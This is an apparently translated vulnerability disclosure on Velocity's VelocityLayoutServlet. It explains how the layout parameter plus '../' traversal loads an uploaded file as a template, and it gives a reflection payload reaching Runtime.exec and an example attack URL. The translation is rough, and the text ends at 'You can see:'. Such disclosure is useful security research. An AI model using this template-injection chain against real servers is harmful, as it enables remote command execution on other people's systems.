VELOCITY Local Code Execution Vulnerability

By empty prodigal heart http://www.inbreak.net
Velocity is the most common presentation layer template file in J2EE MVC Architecture. This template is used by many J2EE applications due to its excellent performance. It is usually used in combination with other frameworks. The most common frameworks are struts2, spring mvc, and other frameworks.
The template extension is "vm". Developers often need to make the framework parse the "vm" Extension during configuration. Velocity officially provides standard configuration. In showcase, the servlet that guides you to configure the vm file is VelocityLayoutServlet.
This vulnerability will occur if it complies with the official velocity Standard (you can download its showcase in velocity-tools-2.0 and run it directly ).

Vulnerability principle:
When using the velocity framework, developers often configure the URL. When the request file extension is vm, the corresponding velocity template is parsed, and a servlet is required. Velocity provides its own servlet for you to use. There are two in total. The most recommended among them is VelocityLayoutServlet, which is used in official showcase.
This servlet works with several techniques to execute arbitrary java code.
Vulnerability entry:
The vulnerability lies in the fact that VelocityLayoutServlet allows users to submit the layout parameter and specify the template location.
When this servlet looks for the layout template, you can allow the url parameter to be submitted.

protected String findLayout(HttpServletRequest request){// check if an alternate layout has been specified// by way of the request parametersString layout = request.getParameter(KEY_LAYOUT);// also look in the request attributesif (layout == null){layout = (String)request.getAttribute(KEY_LAYOUT);}return layout;}

From the code, we can see that layout is specified in the parameter and the code after servlet is used to parse the template.
Related code

mergeTemplate(template, context, response);

Tip 1:
This Code does not parse whether the template extension is vm or not. Because velocity itself has the configuration file extension function, you can specify velocity in the configuration to parse html files as template files.
Therefore, from the Framework perspective, the official website will only say this is a necessary function.
Tip 2:
Although the specified template location must be in the layout folder in the velocity configuration file, you can use "../" to bypass it.

tools.view.servlet.layout.directory = /layout/

This is a tragedy. If the directory is restricted, the vulnerability will have little impact.
Tip 3:
Forget it. I will not mention it for the time being. the next framework vulnerability will tell you something that everyone is familiar with, but is also tricky.
Tip 4:
When parsing a velocity template, you are allowed to access many things. You can think of it as an upgraded version of jsp, including executing system commands.
Yes, I did not see this in google. Someone mentioned it. I discovered it by accident last year (maybe the ox never said it ).
I wrote a simple demo, using velocity to execute java code features and execute system commands.

#set ($exec = "kxlzx")$exec.class.forName("java.lang.Runtime").getRuntime().exec("calc")

The principle is to define a variable named $ exec. The variable actually inherits the Object, so you can call the Object method. One of the attributes is class, which can be reflected. I like this feature and it has been applied to java framework vulnerabilities for countless times. In this way, you can go to the place where you want to execute system commands step by step.
Limit 1 (files must be uploaded ):
Obviously, this is not what everyone would like to see. The local files that can be executed must be in the web directory, because velocity has been able to configure the directory limit to die from early versions, vm templates can only be in the web directory.
Therefore, you must upload files regardless of the extension.
Use Limit 2 (how to discover from outside ):
This is more difficult, because if layout is not found, that is, the attacker can specify a non-existent layout, the error log will be recorded, but will not be returned to the user.
The user sees a 200 normal page. In the case of incorrect layout, the default layout will be used. This is the result seen from the outside, which is the same as the page without entering this parameter. The only thing that can be determined is that the url has a large affirmative extension vm (Other extensions can be configured as mentioned above ).
Others don't want to talk about it here. I will post a web framework fingerprint article to discuss this issue.

Attack example:
For example, the official showcase of velocity
If attackers can upload files to the web directory, such
Z.gif:

#set ($exec = "kxlzx")$exec.class.forName("java.lang.Runtime").getRuntime().exec("calc")hacked by kxlzx&lt;br&gt;<a href="http://www.bkjia.com/">http://www.bkjia.com/</a>

Then access: http://www.bkjia.com/showcase/context. vm? Layout = ../z.gif

You can see: